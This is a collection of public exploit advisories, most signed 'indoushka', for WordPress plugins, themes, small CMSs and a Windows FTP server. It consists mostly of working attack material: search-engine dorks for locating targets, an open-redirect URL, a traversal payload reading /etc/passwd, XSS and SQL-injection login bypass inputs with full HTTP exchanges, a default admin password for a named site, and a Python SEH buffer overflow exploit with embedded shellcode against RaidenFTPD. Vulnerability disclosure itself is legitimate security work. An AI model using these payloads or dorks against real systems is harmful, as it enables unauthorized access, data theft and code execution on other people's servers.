<pre><code>====================================================================================================================================<br />| # Title : WordPress Page Builder KingComposer 2.9.5 Open Redirect Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | <br />| # Vendor : https://kingcomposer.com/ | <br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload : /wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://packetstormsecurity.com/<br /><br />[+] https://example.com/wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://packetstormsecurity.com/<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : WordPress - ChurcHope Responsive Themes 4.7.x Directory Traversal Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit) | <br />| # Vendor : http://themeforest.net/item/churchope-responsive-wordpress-theme/2708562 | <br />| # Dork : "/wp-content/themes/churchope/lib/" |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use payload : /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../../../../../../etc/passwd<br /><br />[+] http://127.0.0.1/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../../../../../../etc/passwd<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : CMS-Bank Mellat Payment Manager v1.0.0 Xss Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 114.0.2 (64 bits) | <br />| # Vendor : https://github.com/ | <br />| # Dork : |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine. <br /><br />[+] Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code <br /> (usually in the form of Javascript) to another user. <br /> Because a browser cannot know if the script should be trusted or not, it will execute the script in the user context <br /> allowing the attacker to access any cookies or session tokens retained by the browser. <br /> <br />[+] Affected items : <br /> <br /> /bank/default.php <br /> /bank/index.php <br /> <br />[+] The impact of this vulnerability :<br /><br /> Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user in order to gather data <br /> from them. An attacker can steal the session cookie and take over the account, impersonating the user. It is also possible to modify <br /> the content of the page presented to the user. <br /><br />[+] How to fix this vulnerability :<br /><br /> Your script should filter metacharacters from user input.<br /> Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code <br /> (usually in the form of Javascript) to another user. Because a browser cannot know if the script should be trusted or not,<br /> it will execute the script in the user context allowing the attacker to access any cookies or session tokens retained by the browser. <br /><br />[+] Attack details :<br /><br /> URL encoded POST input PayAdditionalData was set to 01/01/1967" onmouseover=prompt(940051) bad="<br /> The input is reflected inside a tag parameter between double quotes.<br /><br /> URL encoded POST input PayAmount was set to 1" onmouseover=prompt(911818) bad="<br /> The input is reflected inside a tag parameter between double quotes.<br /><br /> URL encoded POST input pay_from was set to 1" onmouseover=prompt(965239) bad="<br /> The input is reflected inside a tag parameter between double quotes.<br /><br /> URL encoded POST input pay_from1 was set to 1" onmouseover=prompt(951829) bad="<br /> The input is reflected inside a tag parameter between double quotes.<br /> <br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * ViRuS_Ra3cH * yasMouh | <br />=======================================================================================================================================<br /><br /></code></pre>
<pre><code># Exploit Title: RaidenFTPD 2.4.4005 - Buffer Overflow (SEH)<br /># Date: 18/07/2023<br /># Exploit Author: Andre Nogueira<br /># Vendor Homepage: https://www.raidenftpd.com/en/<br /># Software Link: http://www.raidenmaild.com/download/raidenftpd2.exe<br /># Version: RaidenFTPD 2.4.4005<br /># Tested on: Microsoft Windows 10 Build 19045<br /><br /># 1.- Open RaidenFTPD<br /># 2.- Click on 'Setup' -> 'Step by step setup wizard'<br /># 3.- Run python code: exploit-raidenftpd.py<br /># 4.- Paste the content of exploit-raiden.txt into the field 'Server name'<br /># 5.- Click 'next' -> 'next' -> 'ok'<br /># 6.- Pop calc.exe<br /><br /><br />#!/usr/bin/env python3<br />from struct import pack<br /><br />crash = 2000<br />offset = 497<br /><br /># msfvenom -p windows/exec CMD="calc.exe" -a x86 -f python -v shellcode --b "\x00\x0d" <br />shellcode = b"\x90" * 8<br />shellcode += b"\xb8\x9c\x78\x14\x60\xd9\xc2\xd9\x74\x24\xf4"<br />shellcode += b"\x5a\x33\xc9\xb1\x31\x83\xea\xfc\x31\x42\x0f"<br />shellcode += b"\x03\x42\x93\x9a\xe1\x9c\x43\xd8\x0a\x5d\x93"<br />shellcode += b"\xbd\x83\xb8\xa2\xfd\xf0\xc9\x94\xcd\x73\x9f"<br />shellcode += b"\x18\xa5\xd6\x34\xab\xcb\xfe\x3b\x1c\x61\xd9"<br />shellcode += b"\x72\x9d\xda\x19\x14\x1d\x21\x4e\xf6\x1c\xea"<br />shellcode += b"\x83\xf7\x59\x17\x69\xa5\x32\x53\xdc\x5a\x37"<br />shellcode += b"\x29\xdd\xd1\x0b\xbf\x65\x05\xdb\xbe\x44\x98"<br />shellcode += b"\x50\x99\x46\x1a\xb5\x91\xce\x04\xda\x9c\x99"<br />shellcode += b"\xbf\x28\x6a\x18\x16\x61\x93\xb7\x57\x4e\x66"<br />shellcode += b"\xc9\x90\x68\x99\xbc\xe8\x8b\x24\xc7\x2e\xf6"<br />shellcode += b"\xf2\x42\xb5\x50\x70\xf4\x11\x61\x55\x63\xd1"<br />shellcode += b"\x6d\x12\xe7\xbd\x71\xa5\x24\xb6\x8d\x2e\xcb"<br />shellcode += b"\x19\x04\x74\xe8\xbd\x4d\x2e\x91\xe4\x2b\x81"<br />shellcode += b"\xae\xf7\x94\x7e\x0b\x73\x38\x6a\x26\xde\x56"<br />shellcode += b"\x6d\xb4\x64\x14\x6d\xc6\x66\x08\x06\xf7\xed"<br />shellcode += b"\xc7\x51\x08\x24\xac\xae\x42\x65\x84\x26\x0b"<br />shellcode += b"\xff\x95\x2a\xac\xd5\xd9\x52\x2f\xdc\xa1\xa0"<br />shellcode += b"\x2f\x95\xa4\xed\xf7\x45\xd4\x7e\x92\x69\x4b"<br />shellcode += b"\x7e\xb7\x09\x0a\xec\x5b\xe0\xa9\x94\xfe\xfc"<br /><br />nSEH = b"\xeb\x06\x90\x90" # short jump of 8 bytes<br />SEH = pack("<L", 0x7c1e76ff) # pop eax; pop esi; ret; => msvcp70.dll<br /><br />buffer = b"A" * offset<br />buffer += nSEH<br />buffer += SEH<br />buffer += shellcode<br />buffer += b"D" * (crash -len(buffer))<br /><br />file_payload = open("exploit-raiden.txt", 'wb')<br />print("[*] Creating the .txt file for out payload")<br />file_payload.write(buffer)<br />print("[*] Writing malicious payload to the .txt file")<br />file_payload.close()<br /> <br /><br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : CMS TSS-EST V1.0.0 auth by pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit) |<br />| # Vendor : https://p30vel.ir/ |<br />| # Dork : Powered by: TSS-EST.COM |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine .<br /><br />[+] use Payload : user & pass : ADMIN' OR 1=1#<br /><br />[+] http://127.0.0.1/tishreen-uhledusy/cms/ <br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code># Exploit Title: Foody Friend 1.0 - Arbitrary File Upload<br /># Exploit Author: CraCkEr<br /># Date: 12/07/2023<br /># Vendor: Bug Finder<br /># Vendor Homepage: https://bugfinder.net/<br /># Software Link: https://bugfinder.net/product/foody-friend-a-saas-based-web-app-food-ordering-bot-for-telegram-and-messenger/25<br /># Tested on: Windows 10 Pro<br /># Impact: Allows User to upload files to the web server<br /><br /><br /><br />## Description<br /><br />Allows Attacker to upload malicious files onto the server, such as Stored XSS<br /><br /><br /><br />## Steps to Reproduce:<br /><br />1. Login as [Normal User]<br />2. In [User Dashboard] go to [Edit profile]<br />3. Choose profile picture & Upload any Image & Click on [Save Changes]<br />4. Catch the POST Request with [Burp Proxy Intercept]<br />5. Inject your [Stored XSS]<br /> <br />POST /user/profile HTTP/2<br /><br />-----------------------------------------------------------<br />Content-Disposition: form-data; name="profile_picture"; filename="XSS.png"<br />Content-Type: image/png<br /><br /><script>alert(1)</script><br />-----------------------------------------------------------<br /><br />6. Send the Request<br />7. Right Click on Your Profile Picture [Copy the Path of the Image]<br />8. Access your Uploded Evil file on this Path: https://website/assets/upload/userProfile/[Stored-XSS]<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : CMS Supported IRF-TH v2.0.6 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit) |<br />| # Vendor : http://www.euroyouth.org.ua | <br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine <br /><br />[+] Use payload in search box : <script>alert(/indoushka/);</script><br /><br />[+] http://127.0.0.1/euroyouthorgua/en/search.php<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code># Exploit Title: Wifi Soft Unibox Administration 3.0 & 3.1 Login Page - Sql Injection<br /># Google Dork: intext:"Unibox Administration 3.1", intext:"Unibox 3.0"<br /># Date: 07/2023<br /># Exploit Author: Ansh Jain @sudoark<br /># Author Contact : arkinux01@gmail.com<br /># Vendor Homepage: https://www.wifi-soft.com/<br /># Software Link:<br />https://www.wifi-soft.com/products/unibox-hotspot-controller.php<br /># Version: Unibox Administration 3.0 & 3.1<br /># Tested on: Microsoft Windows 11<br /># CVE : CVE-2023-34635<br /># CVE URL : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34635<br /><br />The Wifi Soft Unibox Administration 3.0 and 3.1 Login Page is vulnerable to<br />SQL Injection, which can lead to unauthorised admin access for attackers.<br />The vulnerability occurs because of not validating or sanitising the user<br />input in the username field of the login page and directly sending the<br />input to the backend server and database.<br /><br />## How to Reproduce<br />Step 1 : Visit the login page and check the version, whether it is 3.0,<br />3.1, or not.<br />Step 2 : Add this payload " 'or 1=1 limit 1-- - " to the username field and<br />enter any random password.<br />Step 3 : Fill in the captcha and hit login. After hitting login, you have<br />been successfully logged in as an administrator and can see anyone's user<br />data, modify data, revoke access, etc.<br /><br /><br />--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br />### Login Request<br />--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /><br />-----------------------------------------------------------------------------------------------------------------------<br />Parameters: username, password, captcha, action<br />-----------------------------------------------------------------------------------------------------------------------<br /><br />POST /index.php HTTP/2<br />Host: 255.255.255.255.host.com<br />Cookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858d<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101<br />Firefox/102.0<br />Accept:<br />text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 83<br />Origin: https://255.255.255.255.host.com<br />Referer: https://255.255.255.255.host.com/index.php<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br />Te: trailers<br /><br />username='or+1=1+limit+1--+-&password=randompassword&captcha=69199&action=Login<br /><br />--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br />### Login Response<br />--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /><br />HTTP/2 302 Found<br />Server: nginx<br />Date: Tue, 18 Jul 2023 13:32:14 GMT<br />Content-Type: text/html; charset=UTF-8<br />Location: ./dashboard/dashboard<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br /><br />--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br />### Successful Loggedin Request<br />--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /><br />GET /dashboard/dashboard HTTP/2<br />Host: 255.255.255.255.host.com<br />Cookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858d<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101<br />Firefox/102.0<br />Accept:<br />text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Referer: https://255.255.255.255.host.com/index.php<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br />Te: trailers<br /><br />--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br />### Successful Loggedin Response<br />--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /><br />HTTP/2 200 OK<br />Server: nginx<br />Date: Tue, 18 Jul 2023 13:32:43 GMT<br />Content-Type: text/html; charset=UTF-8<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Cache_control: private<br /><br /><br /><!DOCTYPE html><br /><html lang="en"><br />html content<br /></html><br /><br /></code></pre>
<pre><code>=========================================================================================<br />| # Title : CMS SAUDI SOFTECH v5.0.2 Sql injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit) |<br />| # Vendor : http://www.saudisoftech.com/ | <br />| # Dork : intext:"DESIGNED BY: SAUDI SOFTECH (MST)" |<br />=========================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine <br /><br />[+] Login : /panel/<br /><br />[+] http://127.0.0.1/ihabeccom/page.php?id=48 <==== inject her<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : CMS NEXIN engine v2.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit) |<br />| # Vendor : http://www.composeit.hu/ | <br />| # Dork : NEXIN engine v2.0 |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] appears to leave a default administrative account in place post installation.<br /><br />[+] Panel : http://wlugashotelcom/admin/<br /><br />[+] User : root & pass : job314<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>